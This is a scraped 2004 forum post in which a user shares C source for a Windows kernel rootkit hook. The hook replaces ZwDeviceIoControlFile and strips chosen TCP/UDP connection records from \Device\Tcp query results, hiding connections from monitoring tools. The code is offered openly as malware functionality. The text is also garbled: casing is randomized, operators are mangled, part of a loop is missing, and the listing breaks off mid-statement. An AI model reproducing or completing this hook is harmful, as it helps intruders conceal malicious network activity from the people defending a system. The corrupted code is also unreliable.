PortConnection Hiding

Port / Connection Hiding @ :: Worthy :: Jun 18 2004, 15:57 (UTC 0) AKcom Writes: After Rooting Holyfather's Article on Rootkits, I Wrote a hook to hide connections. I've noticed a few people Saying That That already available ones are buggy, so heres my hook (in C , minor modifications would make it c compatible) typedef struct _GENERIC_RECORD {ULONG entry1; // state on tcp, local addr on udp ULONG entry2; // local addr on tcp, local port on udp ULONG entry3; // local port on tcp ULONG entry4; // remote addr on tcp ULONG entry5; // remote port on tcp} GENERIC_RECORD, * PGENERIC_RECORD; NTSTATUSNTAPINewZwDeviceIoControlFile (IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength) {NTSTATUS ntRes = ((ZWDICF) OldZwDeviceIoControlFile) (FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength); if (NT_SUCCESS (ntRes!)) {Return ntRes;} if (IoControlCode ! = 0x120003) {RETURN NTRES;} POBJECT_NAME_INFORMATION ObjectName; Char ObjectNameBuf [512]; Ulong ReturnLen; ObjectName = (POBJECT_NAME_INFORMATION) ObjectNameBuf; ObjectName->

Name.MaximumLength = 500; ZwQueryObject (FileHandle, ObjectNameInfo, ObjectName, sizeof (ObjectNameBuf), & ReturnLen); char ObjectNameMBS [261]; wcstombs (ObjectNameMBS, ObjectName-> Name.Buffer, sizeof (ObjectNameMBS)); if (stricmp (ObjectNameMBS , "// device // TCP")! = 0) {RETURN NTRES;} PBYTE INPUT = (Pbyte) InputBuffer; IF (InputBufferLength <17) {Return NTRES;} Bool TCP = False; / * if ITS TCP, THEN THE FIRST ITEM IGNORE * / ULONG RECORDSIZE = 0; if (INPUT [0] == 0x00) {TCP = true; RecordSize = SizeOf (MIB_TCPROW); // TCP IF (Input [16] = = 0x02) {// Extended RecordSize = 4;}} else {// udp recordsize = sizeof (mib_udprow); // extended if (input [16] == 0x02) {recordsize = 4;}} ulong entrycount = Iostatusblock-> information / recordsize; bool done; pgeneric_record data = (pgeneric_record) OutputBuffer; ulong i; ulong ip; usort port; i = 0; while (i Entry2: data-> entry1; port = (usHort) (TCP? Data-> Entry3: data-> entry2); // i use a linked list of records to hide, / / just replace this with your comparison if (matchesConMask (ip, port, g_ConList)) {// local stuff hideEndPoint ((PGENERIC_RECORD) OutputBuffer, entryCount, i, recordSize); IoStatusBlock-> Information - = recordSize; entryCount--;} Else // I Use a linked list of records to hide, // Just Replace this with your commit i (tcp && matchesconmask (data->